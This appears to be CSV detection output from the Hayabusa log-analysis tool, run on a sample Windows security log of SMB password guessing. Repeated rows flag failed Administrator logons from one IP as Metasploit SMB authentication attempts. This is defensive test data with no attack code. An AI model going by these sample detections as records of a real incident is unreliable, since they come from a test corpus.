SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZCPSO4JLjMur2Eow : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHmrv2xFuq7TyIQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8SqYq3msNfFh24lg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: YE0a2Bypzc1MMdGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ojgIg88VK6hB72PI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehLrf2GoAhY3Rf7Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ccfgpjwpis15B4gY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vysSf3DsOxQf5fVd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEp88cEeiNw4IQsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5PXDJPzw0gPdlCiH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mwoe9IgWx2UZ7Iuu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3eW0nFDUwKFzoQIw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q0i0p5QxJ4ykYYJt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VsxqWAnd6j2CdyB3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5qdy80mtFWl199k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ce0d84uBK4t2sqR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4dZYZEW1VijjwHN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmqGJWbeap5dv0gC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaNUqChgVSbDkFQu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B4PDZ55it0V4QGnM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQxXVB8Aj5gaw2f2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzDeZtgSJoH74GYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iNAFsZraFvw67WWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0aVdnbyzWqk58rOW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjUH2PopXCrrPzqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ylmV2z3WjTWsTpyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qBKZTYRTKuEAgS8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JvekO4A5f6QK2ynZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDUqydSeA1guOjIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o71TltsJDyOIuLQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXT3MSCes42dVCNn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FGXiWeT8Evr6G70M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V2RarzrnGgcLaseH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: u3k7dXu9o1vMkhby : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EDBt76dmYnPstFWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4yjzMC7cw0fe7gjS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eQOWCM7KP68DZTX9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kn9WWWqCIwfrPbie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQcamLSzsXOjP6FL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6R6ZMRoYkAPB35Bq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubqnZm0jmHNFCHrM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ORQ8vL1oo6CkJXK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rDPl1SSddrWEs979 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VrK7fENAr1lxFr9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wu4djhEVSMYBOmjF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e0NOdXhEkW6MskA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nqxLHaOtkHHNAa1 : IP Address: 192.168.198.149 : AuthPackage: 
